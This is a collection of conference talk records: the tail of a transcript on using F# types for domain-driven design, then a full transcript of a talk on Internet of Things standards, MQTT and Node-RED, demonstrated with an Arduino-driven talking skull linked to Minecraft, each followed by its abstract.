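    let createEmailAddress (s: string) =
        if Regex.IsMatch(s, @"^\S+@\S+$") then Some (EmailAddress s) else None

    // string -> String50 option
    let createString50 (s: string) =
        if s <> null && s.Length <= 50 then Some (String50 s) else None

    // int -> OrderLineQty option: only 1..99 is representable
    let createOrderLineQty qty =
        if qty >= 1 && qty <= 99 then Some (OrderLineQty qty) else None

    // decreasing a quantity can fall out of range, so the result is optional too
    let minusOne (OrderLineQty qty) = createOrderLineQty (qty - 1)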
The first business rule is if the email is changed, you have to set it back to false because it's not verified. And the only way you can set it to true is if it's been verified by some sort of verification service. You know, they click on an email and there's a hash in the email and you check that the hash matches. And if it's OK, then it's all good. So those are business rules. Now, again, normally in C sharp, those business rules would be sort of embedded in the code. My question is, can we embed those business rules in the type system? So it's compile time error to get it wrong. So the compiler will not let you set that to true by mistake. Is that even possible? So let's see. So this is not very good. This is terrible because anybody could set it to true and say, oh yeah, this is a verified email address, even though it isn't. So how would you do this in F sharp? Well, the first thing you'd do is you would wrap the email address in a new type called a verified email address. And this is one of the things you tend to get in functional programming, which is any time you have a problem, you solve it by wrapping it in another type. There's no problem that can't be solved by wrapping it in another type, basically. So you tend to have these types within types within types. But because it's a one-liner, it's really easy to do. And it's equally easy to unpack it as well. So now I have a difference now between a normal email address and a verified email address. They're now different types, and they can't get mixed up. That's good. And how do I get one of these verified emails? I have an email service, a verification service, and it takes in an email address as input, and it takes in some sort of hash, which you pass in, and it checks the hash. And if it matches the email, it says, yeah, this is a verified email. Or it might say, actually, it's not. So that's why it's an option. I can tell straight away from this service that it might not work. So email input, an optional verified email is the output. And then what I do is I define my email information as a choice. I say either it's an unverified email or it's a verified email. If it's an unverified email, it's just a normal email address. If it's a verified email, it has to be one of these special verified email addresses. And the only people who can create this is this verification service. I can't create one of these things. Only the verification service can. So when I'm coming along and I want to change the email address, I can change it to unverified, but I can't change it to verified. So this is a way of guaranteeing in the type system that I can't have an accidentally verified email address. So I've got rid of the Boolean and replaced it with two choices. And that's a very common thing you'll see in functional code is every time you have these Boolean flags, like has it been shipped, has the order been paid, all that kind of stuff, those are replaced by a set of states, a set of choices, and each choice might have different types associated with it. So let's go back to our original challenge. Here is our email address. We've broken up into we had one type originally, and now we've got five, six types plus the verification service. The questions were, again, which values are optional, what are the constraints, which fields are linked, and what is the domain logic. So which values are optional? Is this now clear from the code? I could show this to somebody and say, which one's optional? And you say, yeah, the middle initial is optional. 
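A sketch of the verified/unverified design just described, building on the EmailAddress type from the earlier sketch; the names (VerifiedEmailAddress, EmailContactInfo, the hash type) are mine.

```fsharp
// Wrap an already-valid email in yet another type to mark it as verified.
type VerifiedEmailAddress = VerifiedEmailAddress of EmailAddress

// Either/or: a plain address, or one that has been through verification.
type EmailContactInfo =
    | Unverified of EmailAddress
    | Verified of VerifiedEmailAddress

// Only the verification service should produce VerifiedEmailAddress values
// (in a full version its constructor would be private to that service).
type VerificationHash = VerificationHash of string
type VerificationService =
    EmailAddress -> VerificationHash -> VerifiedEmailAddress option
```

When the user changes their address, ordinary code can only build an Unverified value, which is the compile-time version of the "set it back to false" rule.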
The other ones are not optional because they're not allowed to be null, remember? So they're required. The first name is, by definition, required. If I don't say it's optional, it has to be required. The constraints, now, I've replaced with these special types called String50 or String1. And the email address, again, is a constrained type. So if I have a first name, I know it's going to be less than 50 characters. When it comes time to put it into the database, I know that I'm never going to have some database bounds exception that I have to handle, because I know it's going to be within the right length. Which fields are linked? Well, that's easy. I just created two little smaller types. That was trivial. And finally, is the domain logic clear? And it is, I think, because it's now very clear that I have unverified and verified ones. And it's also very clear that the verified email is a different kind of thing than a normal email. What's interesting about this is not only that I've now encoded all those rules in the design, but the ubiquitous language has evolved, too. So in my design, I now have something called an email contact info. I have something called a verified email address. So these are things that I didn't have in the original design. But in fact, these actually do represent concepts in the domain. If I was talking to the business, we'd say, yeah, we have verified emails and we have non-verified emails. So I've actually documented that now, which the original design didn't have. And of course, it's compilable code. This is not pseudo code. This is not a UML diagram. This is real code that compiles. And it would be basically the first file in your F# project. So if you don't mind hanging around for another couple of minutes, I just want to do one more thing, which is this concept called making illegal states unrepresentable. So let's say that some time passes and we now have an address as well as an email. The requirements are changing now. And we have a new business rule that the contact must have an email or a postal address. So I need to be able to contact you somehow. That's a fair enough requirement. So does this type actually meet that requirement? And the answer is no, it doesn't. Because the way it stands right now, both the email and the address are required. They're both required fields, right? They can't be null. So they're both required. So this doesn't allow for the case where I have one but not the other. All right, well, I'll make them both optional. So, does that solve it? No, that doesn't solve it either, because now they could both be missing. So the business requirement is you have to have one of them. You can't have them both missing. So how can I encode that business requirement? Again, in C#, we'd probably have some code buried away somewhere that says, well, if they're both null, then throw an exception or return an error or something. It'd be nice if we could actually encode that in the type in such a way that you didn't even have to deal with that case. You could literally not represent it. So that is this concept called make illegal states unrepresentable. If you can't do something, don't even allow it to be in the type system. In this design, I could make them both optional or both null. It's like, don't allow that to happen. So how can I prevent that from happening in the type system? Well, if you think about it, that business rule says that you either have an email address, or you have a postal address, or you have both.
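A sketch of a type that captures that three-way rule directly, using the EmailContactInfo type from the earlier sketch; the case names and the simplified PostalAddress are mine.

```fsharp
// A stand-in for a real postal address type.
type PostalAddress = PostalAddress of string

// Email only, address only, or both. There is no case for "neither",
// so that illegal state simply cannot be constructed.
type ContactInfo =
    | EmailOnly of EmailContactInfo
    | AddrOnly of PostalAddress
    | EmailAndAddr of EmailContactInfo * PostalAddress
```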
That's what the business rule says. There's only three choices, not four choices, not two choices. Well, how would you represent that? Well, as I say, you always wrap everything in a type. You create a new type with three choices, where it's email-only or address-only or an email and postal address. So I now have a type that represents that business rule. And I literally cannot have both of them missing, because it's not one of the choices in the type. So by defining a type like this, I can actually hard-code my business rule into my design in such a way that I literally cannot mess it up. You cannot have a bug from having them both missing, because there is no way to represent them both missing. And then I just replaced my email address with this one new type. So what I've done is I started with them as separate things, and I've merged them into a single thing, which now has a set of choices. So static types are really awesome, almost as awesome as that. One final thing: let's say that's a rather restrictive rule, an email address or a postal address. The business probably didn't really mean that. What they probably meant is that you have to have at least one way of being contacted, because you're a contact. I should be able to contact you in at least one way. So rather than doing that, what I might do is say, well, these are the different ways of contacting you. I can contact you with an email, or I can contact you by sending you a letter. And then in the contact type or structure, I have a primary contact information and a secondary contact information. And the primary contact information is required, and the secondary contact is optional. So again, the type system has created something that, when you talk about it, the business says, oh yeah, of course, we have a primary contact and a secondary contact. It's a new part of the domain language now. You've got a new part of the ubiquitous language: the concept of a primary contact. And again, the primary contact is not allowed to be null, so it's by definition required. It's very clear from this code what the business rule is. So I talked about the challenge. I talked about ubiquitous language, self-documenting designs, algebraic types, designing with types, using options, single case unions, and making illegal states unrepresentable. So hopefully this all makes sense now. I haven't talked about states and transitions. That's a really important thing. Services, CQRS, how you do the functional approach to use cases, and domain events, and error handling. So if you're worried about using F#, I actually think you should just try it out. Like I said, even if you just use the type system and don't write any code, it has the support of Microsoft, and if you want to go mobile, it's built into Xamarin Studio. That gets you F# on millions of devices. So it's a very safe choice. If you need to persuade your manager, I have some examples at FPBridge. And there is the link to my site, and I'm on Twitter if you've got any questions. Contact me on Twitter. And if you need any help with F#, contact me at my consulting business. Thanks very much. If you have any questions, please come and see me afterwards, and please remember to fill in the review things, yes. And there are some more F# things tomorrow morning, by the way. Two F# talks tomorrow morning if you're interested in F#. Please go to those.
|
Statically typed functional programming languages like F# encourage a very different way of thinking about types. The type system is your friend, not an annoyance, and can be used in many ways that might not be familiar to OO programmers. Types can be used to represent the domain in a fine-grained, self documenting way. And in many cases, types can even be used to encode business rules so that you literally cannot create incorrect code. You can then use the static type checking almost as an instant unit test — making sure that your code is correct at compile time. In this talk, we'll look at some of the ways you can use types as part of a domain driven design process, with some simple real world examples in F#. No jargon, no maths, and no prior F# experience necessary.
|
10.5446/50869 (DOI)
|
Hello. Good morning. Was the party great last night? Who or you are not hungover? Some of you must be lying. Welcome to my talk about the Internet of Things. I am Simon Somefelt. I work for the CTO at Bouvet in Oslo. I also founded the national movement to teach kids to code. Do any of your kids code at all? Good. Good. You save them. With me I got Keith Richards. I connected him with a... Oh, well. I asked my friends on Twitter and Facebook what to name him. I also suggested. But YouTube made a decision. I uploaded the video after I played it. He found similarities. So we named him Keith. He is connected via some mechanisms. I will talk to you about that later on. That alerts him when somebody is getting too close. I will talk about what we say. Some thoughts on how to get started in enterprise and what it can be for all of us. And what I think must be the enablers. That is more like philosophical in the future. And what the vendors are saying and the relevant standards. We exist for protocols today. And I will dive into one called MQTT. And a nice tool called Node Red. I mean, this Internet of Things concept is changing all the time and people change their opinion. But at least you get one thing out of this talk. And that is an idea on how to scare the kids in Halloween. By using this setup or a similar setup. Like I said, the Internet of Things is a really confusing topic. Every day there are like 10 more articles at least or maybe 100 saying seven ways the Internet of Things can improve your sex life or five things the Internet of Things means to a CEO and something. And it has been really hard to filter it all and try to digest something out of it. Because this is just happening all the time. I wrote a blog post about how, with a little story I'm going to tell you later on. Where I tried to picture what it can be in the future and why I think it's not coming so soon. And because I had written one article that wasn't just cheerful about it, I was contacted by two national newspapers and interviewed about it. The one article that says it's not coming next year. And they called me like the new weeks next but on this, which is kind of scary. And now I maybe call an official Luddite. The Internet of Things is supposed to bring huge businesses and huge numbers of devices very soon. Like IDC says it will be 8.9 trillion market in 2012, in 2020. In contrast the gross domestic product of the US is 15.5 trillion. So I guess it's going to boost that market a little bit. By the way, I stole this slide from a Microsoft presentation just to say that. But Dion Hinchcliffe says that there are actually two different Internet of Things. One is the enterprise one. And it has existed for a while. Where they use sensors, you know, in logistics and to control things. And in the enterprise it supports business processes by sensors using big data orchestration and perhaps even machine learning to make things run better. And Microsoft and IBM are the two companies I found have the most complete stacks, the most complete offering. For Microsoft everything is about the cloud. They want to put everything in the Azure of course. But they have a complete development stack for all kinds of devices. All from the smallest ones like the connect to the Nike fuel band and in Arduino's and Raspberries and up to cars. The same goes with IBM. They also have a big comprehensive solution. But they have the same philosophy that you can capture, connect, analyze, and act and use the cloud all the time. 
But the other Internet of Things is just getting started, the consumer one. And it's only been happening in a significant way the last two or three years. I promise that gives some advice for if you want to use IoT technology in enterprise systems. I kind of regret I did that because it's not easy because every system you have is kind of different. But I asked Michelle Polino at Forest Research what she could say was like the common denominator if you want to add sensors or presence into your systems. And she said that you need to involve all kinds of trades in the company because this can involve, this is actually a customer experience thing if you have humans involved. And you might have to talk to the CRM people, software architects, partners, sales, maybe even lawyers and other stakeholders. So it's not just for techies if you want to get the full potential. And of course, if you're adding sensors, if you're adding objects that have their own intelligence, you're also making potential security holes in your system. And the only thing about privacy and especially operations because if you have something running out there, it needs to be maintained, replaced, but if you do a software upgrade, there's a lot of other things to think about. Well, in the consumer space, which the newspapers now are very busy talking about, we're being told that everything gets connected from phones, houses, cars, buses, everything, everything is supposed to service. And it looks really fantastic, doesn't it? And we're told it's going to happen in like four years. But what is the consumer internet thing? It's very hard to define and we haven't got really a unified definition of it. But Patrick Thibodeau has a very good question that you can ask. If one vendor works with another vendor's product and they communicate without you have to fiddle with them, and so just put something in your home, I think we'll get going. And we're not there yet, not by far. To tell you a little bit about how I think the future can be, I wrote a little essay, which I put in my blog post. And I think that all the different corners, all the different aspects of the internet things maybe can work together to make a bigger whole sometime in the future. To serve us better, to make us utilize the resources better, to save power, to make life easier for us. And this story is about my daughter when she's grown up. So I had her to illustrate it. And it starts in the year 2030. There's me getting quite old with a cane. And she has been alerted that I had the danger of high blood pressure. She comes by with a dog, which looks very similar to the dog we have today. And then she checks on me and she calls the doctor and yells at him for being so negligent about my health. And then she leaves the house because she's been told that one electric heater in the house has been ailing. So she goes into a shop and she looks at different, you see the prices here, different products. And this one she really likes. So seemingly she talks to herself and then she buys it. And it automatically checks whether it fits in her house and the security is checked, it's authenticated, the purchase is made. And she goes out of the store and she's being picked up automatically by a transport without the driver, of course. I have to debate that with my daughter. So in the end she put the flower there in the driver's seat. And it leaves her off at her house and there she goes to put the heater in the place and you see I already come to enjoy the heat from it. 
When she puts it in the place, in the room, it's automatically set up. It doesn't need to be configured anyway. She doesn't have to like put anything on any panel. It just reports to be electric heater in the northwest on the first floor and it's ready to be told if it should turn off the heat. And then she doesn't think more about it. And she goes to play with her children and afterwards at a dinner meal, evening meal she tells her husband about the stupid doctors that she finally got around to replace this electric heater and then they discuss their summer holiday. So this just serves her. She never sees a software interface or has to change anything. She just goes on with her life. This just serves her lives. And to make this happen, I thought what must be in place? What must be the enabler for this? I think one is device classification and interoperability. I like this quote very good. This is from Rosmason of Mulesoft. On the Internet nobody knows you're a toaster. If you put an appliance like your fridge or oven today that you can buy a fridge that has Facebook integration, it won't classify itself as a fridge. If you have like a TV with YouTube on it, it's so cold the Internet will think, they don't know about each other. You can't control the fridge from the TV. They don't talk. Because nobody has agreed about any standard that the devices have or even that there are different devices. There are lists like this one with intellectual property database where you can see that there's an electric radiator, this number here. But I've never seen it referenced in any article about the Internet of Things. And you have lots of protocols in which the different devices can talk to each other. But all the different vendors seem to be hedging on their own different ones. There doesn't seem to be any agreement. And it goes like this. Because they have all invested in their own thingies and their own alliances. So as Patrick says again, there's no wonder which is large enough to define it, but there are certain vendors that are big enough to mess with. The other one is connectivity and address space. You don't need to have an IP address to have a connected thing. You can use Bluetooth. You can all allow powered network standards. And they can form mesh networks. But still, if you think the numbers are like 200 billion devices, then we need to have IPv6 for that to happen. If you want to move a thing out of the living room to go another place, you must have an IP address. And IPv4 is running out. Everybody knows that. But since IPv6 doesn't really present any tangible benefits for the average consumer, there's no rush to get it. Like if I tell my mother-in-law she should get IPv6, she says what? What is it? Well, it's the glue that makes your browser connect to that web server. So. But the problem is that devices who are on IPv6 networks, they don't see servers who are on IPv4 networks. Myself, I got an IPv6 router. But only 10% of the websites in Norway serve IPv6. So it's going to be quite a slow change. And the third one, I think is the most important. It's the security, privacy, and authentication. Imagine if all the ovens or all the fridges and your devices are connected in the house and they can be reached from the Internet, maybe even also control from the cloud. What if a foreign power decides to attack? They don't need to send bomb replace. They can just make all the houses burned down by hacking them. Or even a software update. That is wrong. 
And also we're taking all the problems and weaknesses we have today in the Internet with us into the Internet of Things. I mean, there is a story, a true story, of a DVR recorder that was used to send spam mails and attacks. And the vendors that make house appliances, they're not really software people. They make fridges, they make ovens. So they have a summer intern make the software in the devices. And they're so easy to attack. And the problem even becomes larger with IPv6, because your router in your living room has NAT, it translates the addresses, and accidentally it's a firewall, because you can't reach the devices from outside. But with IPv6, all the devices have their own IP addresses on the Internet. So it could be like a veritable hack feast if you don't have a good firewall in place. Third, privacy. This is a picture of a concierge in a hotel in San Francisco. When people approach this desk, they're automatically Googled by his Glass and checked up on. Makes you feel a bit skimpy, doesn't it? When our local broadcaster NRK borrowed Google Glass and took it on the street to have people test it, they reacted with fear. Because they thought, oh no, the NSA is going to see me here as well. I can't go anywhere without being seen. And this is in a hotel lobby today. And tomorrow, if we have this, if every home is connected and everything can be seen anywhere, and the surveillance is like today, and no politicians are doing anything about it, it can end up like this. Who here has seen Minority Report? Anyone? Good. There are three people submerged in water who dream of crimes being committed in the future. But when we add all this data from all these sensors and all this presence, you can predict how people will behave, and you can use machine learning to check: will he commit a crime or not? And with the current technology, Tom Cruise wouldn't even get out of his house. The doors would be locked for him. Do we want this? I don't know. We can do this with today's technology, actually. And then there's the open business models. Today you can buy a coffee machine that can actually ask to get more capsules, and you have an app for it on your phone, and you can have an app for your fridge, maybe not for your toaster, but for your coffee machine, and you have to have an app for every single device in your house. So the business model is with exactly one actor, that company. But that won't scale. I think it's been influenced by companies like Apple and Amazon, but you can't have that in real life. You won't buy all your kitchen appliances from one vendor, or all the appliances in your whole home. They have to talk to each other. And lastly, user experience. I read an article testing three different home automation systems. They were tested by a guy who was quite knowledgeable, technically, but they were all horrible. He couldn't connect to the devices, the connections dropped, and they were really hard to configure. Imagine giving that to my mother-in-law. And I think Jakob Nielsen said that usability is like a joke: it's really bad if you have to explain it. And now we have to explain everything. And common for all of them is that we need open standards, and preferably open source, for this. So if you do the math, if you take all these different aspects, it's going to take time. I don't know, 2020, 2030, I don't know. So I thought, am I insane? Will I be this nasty, stupid Luddite who thought everything was going so slow?
So I contacted people from different kinds of organizations and had them read my essay, and they all kind of agreed: well, it's not so stupid. So either we are all insane or there's something to it. And I think Michele Pelino at Forrester Research says something good about this, that it's happening very fast in vertical businesses or in closed markets because they agree upon some standards. Like in logistics, for example, they have a motivation to agree upon something and then it can happen quickly. But in the consumer space, there's no real incentive for all the vendors and actors to agree upon anything. And it's also the mindset and the understanding of the politicians, like this privacy thing, which I think makes it a bit slower. We have lots of consumer products. I mean, these are all the offerings you can have for home automation systems. And on the west coast of Norway, the power grid, the utility, they offer a total home control system to their 130,000 customers if they want it. You have a burglar alarm, you can control the heat from your app, you can change the lighting. And internationally, the most exciting vendor I think is Google, because they have the Nest product, which controls heating in houses. And as you saw, they have Google Glass. And they even have self-driving cars. And they have the Android platform to connect everything. Back to this interoperability question. The Linux Foundation has gathered all these companies who make appliances or network products and invited them to make a protocol and a set of software specifications that make things talk together, which is called the AllSeen Alliance. So you have lots of active devices with computers in them. And they promise that soon they will be able to tell each other about changes. And they can even export control of all the devices from different vendors. And if some of them haven't got an internet connection, they can form mesh networks and give each other connectivity. And this is an API and some libraries for lots of different platforms, I think even for the Raspberry, where you have presence, where you can send messages, they can control each other, they can discover each other. And it looks kind of promising. Well, imagine that you are at a cocktail party with all the different vendors of home automation systems. And they're drinking and chatting nervously. In the hammock outside, there's this bear. And they're kind of looking at him nervously. What will he do? Will there be something like, Siri, turn on the lights in your living room? Well, last Monday, Apple's HomeKit was announced. Which is really smart, because they have got a lot of different vendors to agree, or invited a lot of vendors to publish their interfaces and allow Siri to turn up the heating. This could be the tipping point. Maybe. I don't know. Maybe there will be an antitrust lawsuit from Samsung. I'm sure there will be. But this could be the thing that moves things forward. I guess, how many of you have iPhones? Right. That says it all. Just tell Siri to turn up the heat. All right. I'm going to tell you about one protocol and one tool that I find really interesting with regards to the Internet of Things, using this setup. And to do this, I'm emulating that we have different devices. You saw I had this, which tells the distance. And since I'm running a coding-for-kids setup, I've also made a set of Minecraft services that can detect presence. I hope this works now.
So what you see here, going on here, are the messages on the MQTT bus. So it's telling the distance for this alarm right now. I'm connecting, so far so good. Okay. I have to run a command to connect to the server. There we are. Okay. So I'm outside. Do your kids use Minecraft, anyone? Have kids with Minecraft? Yeah. You can take this home and show it to them. It's all on the screen. All right. Look. There's a castle there. Sometimes there are sheep around too. Oh. A door. It looks to be a skull there. Go ahead. Make my day. The skull detected, oh, it doesn't look very nice, this person. Okay. I'll just go inside and check. Oh, no. He's following me. What's happening if I destroy this castle? Oops. It's not working. The demo effect. Oh, I can change his eyes. He doesn't like me messing with this castle. Okay. I think I'll leave this place. You're despicable. Well, you too. All right. What I showed you there is it could be physical devices as well. You can actually use face trackers also with a normal camera, which I think I'm going to do on Halloween with the kids coming for candy. I think I have to check the rage first so they don't wet themselves. The protocol I used for these devices to talk to each other is MQTT. Have you heard of MQTT before? Some of you. It was invented by Dr. Andy Stanford-Clark of IBM and Arlen Nipper of Arcom. He has a good TED talk about it. They needed to connect devices, get all kinds of measurements, and control the devices over unreliable networks and bandwidth, and also on devices that have really low processing power. So it is a really simple pub-sub protocol. If you have read Gregor Hohpe's book on enterprise integration patterns, you can recognize it there. But the cool thing is that you can give a path with your topics. So you start with where this is, the address of the device, the type of it, and a unique identifier, and then you give a status. Like in Minecraft: in this world, the skull at this position has a status, is alone. That fired the "you're despicable" message. And the cool thing is that you can actually subscribe to topic trees with wildcards. So, for example, I can replace a part of the branch here with just a hash and then I get everything after it. So I can get all the skulls, or I can use a plus and match any single link here in the tree, which makes it really easy to specify what you want to get. And you can have multiple brokers. There are even cloud brokers. So if you want to do a home automation system and you are brave enough, you can have it controlled by a cloud broker, and they can shard the different topics on different brokers and broadcast them to each other. It's got some really cool IoT-friendly tricks up its sleeve. When a device connects and starts to publish, it can tell the broker that it has a last will and testament. So if somebody else subscribes to that topic and the publisher dies, the protocol will send this testament to the subscribers, notifying them that it died or went offline. It has got a binary payload, so you can just put anything there: JSON, XML, binary, encrypted. And it has some different quality of service levels if you want to make sure it comes through. And when you publish a topic, you can have a retained message there, so that when a device starts to subscribe to that topic, it will get that message the first time, thereby telling it that you are connected. It's only got a two-byte overhead on every message. A very small footprint; it runs on my Raspberry here.
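To make the wildcard behaviour concrete, here is a small, self-contained F# sketch of how a topic filter with + and # matches a topic path. This is just illustrative logic, not code from any MQTT library, and the example topic names are made up in the spirit of the skull demo.

```fsharp
// '+' matches exactly one level of the topic tree; '#' matches everything below.
let topicMatches (filter: string) (topic: string) =
    let rec go fs ts =
        match fs, ts with
        | [], [] -> true
        | ["#"], _ -> true                        // '#' swallows the rest of the tree
        | "+" :: fRest, _ :: tRest -> go fRest tRest
        | f :: fRest, t :: tRest when f = t -> go fRest tRest
        | _ -> false
    go (List.ofArray (filter.Split('/'))) (List.ofArray (topic.Split('/')))

topicMatches "minecraft/+/skull/#" "minecraft/world1/skull/12/status"   // true
topicMatches "minecraft/+/skull/#" "arduino/uno1/sonar/distance"        // false
```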
I think Stephen Nicholas did a very good, fascinating apples-to-apples comparison when he tried, for a web client, to check for notifications of changes in the data. He compared MQTT versus long polling over HTTPS. And you see the very, very huge difference between the energy expenditure and the bandwidth. And here, have you got Facebook Messenger on your phone, in your pocket? Almost all of you, yeah. Then you've got MQTT in your pocket. Because Facebook got so many complaints from people that the Messenger application drained the batteries, so they changed the protocol to MQTT. And it dramatically improved. And it's so simple that when I sat there in the kitchen toying with this skull, my children could actually look over my shoulder and suggest changes, because it's very, very simple to understand. And it's very simple to set up on the Raspberry. It's one Linux command to install it and it runs. And you can combine it if you have a REST application at work. You can, for example, use MQTT and use a topic path similar to the URI in your REST application to give notifications of changes so that the clients can reload their data. Node-RED is an if-this-then-that for the Internet of Things. What you do, I mean, when you're making these applications with all the different devices, a lot of the code you write is plumbing code to just connect things. And here you get past that, because you have lots of inputs that you connect with logic and then put onto outputs. It runs. So we have many different inputs, like this MQTT queue. You can use WebSockets. You can even use Twitter or IRC. Like here. And you can store it in MongoDB or Redis if you like, or even get the information from MongoDB. It's based on Node.js. And you can embed it in other Node.js packages or use other Node.js packages. So I've installed it on my Raspberry. I spent one hour making one of the more complex flows. To do that in Python, I'd have spent 20 hours at least, because there are a lot of timing issues involved. Like you saw with the skull when I move my hand in front of the sonar: first there's one thing, then the other thing. And then you have to postpone execution of commands and so on and so forth using threading, and it makes your code look hideous. But with Node-RED, it becomes much, much easier to do that. Node-RED is not an enterprise-grade tool yet. But if you want to make your own home control system, I think it can be quite fun to do. With my own setup here, I use the Arduino with the servo shield because the servos draw so much power, they take half an amp each. And the Arduino can't drive that. Then I had to connect it to the Raspberry through a logic level converter. Otherwise, it would toast the Raspberry, because the Arduino runs on 5 volts and the Raspberry runs on 3.3. There's the Raspberry Pi and there's the other Arduino, which is polling the sonar. And there's the breadboard power supply, which has 1.5 amps, which pumps into that servo shield. The skull I just bought at the local novelty store, and I bought a pan-tilt servo set from eBay, costing like 200 kroner or something. And then I used a third servo to control the jaw. And on the Raspberry Pi, I run the MQTT server and the Node-RED server. And it doesn't require many resources. And then, for those who want to do this at home with your kids, you can install the Bukkit server, which makes it possible to use plugins with Minecraft.
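One idea mentioned above, mirroring your REST URIs in MQTT topic paths so clients get cheap change notifications, can be sketched like this. The publish function here is just a stand-in for whatever MQTT client library you use, and the topic naming is my own example, not part of the talk's setup.

```fsharp
// Stand-in for a real MQTT client's publish call.
let publish (topic: string) (payload: string) =
    printfn "PUBLISH %s -> %s" topic payload

// Publish a change notification on a topic that mirrors the resource URI,
// e.g. "/customers/42/orders" becomes "myapp/changes/customers/42/orders".
let notifyResourceChanged (resourceUri: string) =
    publish ("myapp/changes" + resourceUri) "changed"

// A client interested in any customer's orders could subscribe to
// "myapp/changes/customers/+/orders" and re-fetch the data over HTTP when notified.
notifyResourceChanged "/customers/42/orders"
```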
And then I have a scriptcraft plug-in which allows you to control Minecraft with the JavaScript. And I asked the author, Walter Higgins, if he could kindly enable MQTT on it and he thought it was so cool so he did it over a weekend. So thereby I could connect these things. Now, if you look at the log from the MQTTQ, what's happening is that when I put my hand in front of it, it tells that 29 centimeters distance from the sonar. And then the same kind of sonar exists in Minecraft with a similar distance. And there it tells that the skull has company. And then the broker tells the Arduino to turn the lights on. That's what you saw when Clint Eastwood welcomed us in the Minecraft castle. And here's the face tracker. It actually calculates the vector from the player to that skull standing on that stone and takes the sign values of the vector and the broker will then make transfer that into servo movements here. And here I told the levers. And then it sends a command to change the light, the led lamp. And you can change these words and sensors and things into like your oven or your lights in your living room or whatever. And just fiddle with it because it's very easy to test. You can just push the commands on the protocol and it will automatically do things. Yeah. And here it says I'm alone and it turns off the lights and so on. When I started with this, I knew nothing about Arduino. I had many, many years ago I had learned electronics. But I got started with this spark fun in vendors kit and I can really recommend that because it contains a lot of different sensors and the servo and motor. And it has this really nice book which takes you through very simple exercises like this one makes a blink. And when we have kids to try this, I think it's immensely fun because there's something physically happening. And for you to start learning this, when you walk through the whole book, trying to control a servo, trying to use a temperature sensors, trying to change the lights using relays, you can step by step get lots of ideas to control stuff and have fun. So this is kind of the dynamic duo of the hobby home control systems. You can connect most meters, presence detections, temperatures, anything. You can control lights, survey, relays and you can have a combination of this many different places in your house. What I, the sensors I had in Minecraft was at this goal that it takes if the player is near. That would be cool to have in real life, wouldn't it? And the sonar which does exactly the same thing as this physical one. And then redstone levers. And then the block destruction. That's on how we're Simpson said. And finally, the face tracker that gives the vector to the player. This I made in JavaScript. And as you can see the code is really compact up above there. The code is made to find out where the player is. But here is all the code that was necessary to make, to calculate the vectors for the face tracker. And then I published this on the MQTT broker. So this was done in Node Red which I'll show you. This is how it looked like. All the logic that is executed when I do this is what you see here. So I'm getting this sensor, the sonar, strips away the ping text. Then check if that number is less than 30. Then I check if the skull is busy because there's only one skull. And if there's other things going on, I might not want to disturb that. And then I make a delay. And this is where it becomes so much easier than using a normal programming code. 
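Written out as ordinary code, the decision logic in that flow looks roughly like the sketch below. The payload format ("ping 29") and the 30-centimetre threshold come from the description above; the function names and the command type are mine.

```fsharp
type SkullCommand = TurnRight | DoNothing

// Strip the "ping" prefix and parse the distance, if the payload is well formed.
let parseDistance (payload: string) =
    match payload.Split(' ') with
    | [| "ping"; n |] ->
        match System.Int32.TryParse n with
        | true, d -> Some d
        | _ -> None
    | _ -> None

// Somebody is close enough, and the skull isn't already doing something.
let decide skullBusy payload =
    match parseDistance payload with
    | Some distance when distance < 30 && not skullBusy -> TurnRight
    | _ -> DoNothing

decide false "ping 29"    // TurnRight
decide false "ping 120"   // DoNothing
```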
Because here you would have to use threading in another program. And then I turn right. Or if I want it right now, I can change this to turn left instead. See what's happening. So I can inject messages just to test things. Oops. I think I need to... Oops. The demo virus. Yes. What I do is I turn it off. Then I have to start this... Oh. It's even losing the wig. I think I turned it off. Sorry. But what I can do is that I can take away this connection from this. And then I can make a new flow. So here you will see the distance reading should be coming here. There in the debug. So you see on the lower right there it's getting new distances. And then I can take away this ping message from it. And just get the number. So you see what I'm doing now is I'm connecting the input with a logical flow with the messages. And I can see the result immediately. And this you could do with your appliances in your home or temperature meters and just play around with it. So now you see the ping text is taking away. Then I can take that output and see and test on it whether it's so close that I want to do something. So if it's less than 10, I can send a blink command, for example, to this skull and the lights will blink. Or if the temperature was lower than a special you can make your oven turn on. And then I send that to the Arduino. So let's see if the lights are blinking. Oh no. I forgot to connect it there. And there are. And I can have maybe I also want to make a sound. And then I send a special command to another service which is controlling a sound on the Raspberry. And you can say something. And you can mix and match and do all kinds of things with your devices without having to reprogram it. If I had written this in Python, I would spend lots and lots of time testing it, making different, oh no, I made another thread. What's happening with it now? But here you can just concentrate. I even connected my home router which runs Linux to the Node Red server. And then I can detect if one of the kids was at home. Because if they're home, their iPhone, it has an IP address. So I made a sound play in the living room with my youngest son when he came home asking him if he did the homework. And my oldest son, if it was Friday and he came home, it would remind him to do the vacuuming. But it wasn't very popular. And I found out it became like the big dictator in our home. So all this is described in this blog post if you want to get started with this. And it's on the GitHub. The code was written for fun, so it's written by assumption that works by coincidence. I want to thank these people for giving me lots of feedback and input to the articles and my thoughts. And we have an Internet of Things meetup here in Oslo where we'll discuss possibilities and do demos and stuff. And the first meeting is on the 24th of June. So you're welcome there if you'd like to discuss more. Are there any questions? The question was where the Node Red code was deployed. Yes. It is deployed on the Raspberry Pi with the normal Linux package manager and then you use the Node Red package manager. Now, sorry, you install the Node.js and then you use the Node.js package manager to install Node Red. They're like one-line commands each. And then you can, there's actually a repository online with the flows that you can see and check. And you can make your own nodes, actually, Node Red. So if you have an input you want to add or a specific command you want to add, you can just provide the HTML and the JavaScript and you can use it in your flow. 
Other questions? No? Early in the morning? Okay, thank you. And please vote on your way out. I was told by one of the people working here to put a color of how well you liked my talk on the way out. Thank you.
|
My aim is to clear away some misunderstandings regarding the Internet of Things, and introduce MQTT - a protocol that is considered one of the most promising. I'll start with a live demo of my IoT setup with a sonar, Arduino, Raspberry Pi, MQTT, a talking skull, Node-RED, sensors and Minecraft! Perhaps you can use the setup to have an entertaining Halloween… Part one of this talk provides a picture of what the selling points for IoT are - and some of the obstacles we'll meet on our way to get there. Part two focuses on technology: different competing standards for IoT - with examples. This should be relevant to many of the listeners, as most consultancies and companies will come across IoT in the coming years. How I use one of the most promising protocols - MQTT - in a hobby project that can also involve children in order to teach a little coding, a bit about the Internet of Things, and some hobby electronics. I'll introduce Node-RED - a Node.js-based framework for orchestration of IoT and MQTT. I'm going to show message flow, source code, live influence on the components, and best practices for MQTT orchestration. In conclusion I'll give examples of how you can use IoT technologies like MQTT in typical business systems to bridge them to the physical world via sensors and indicators.
|
10.5446/50871 (DOI)
|
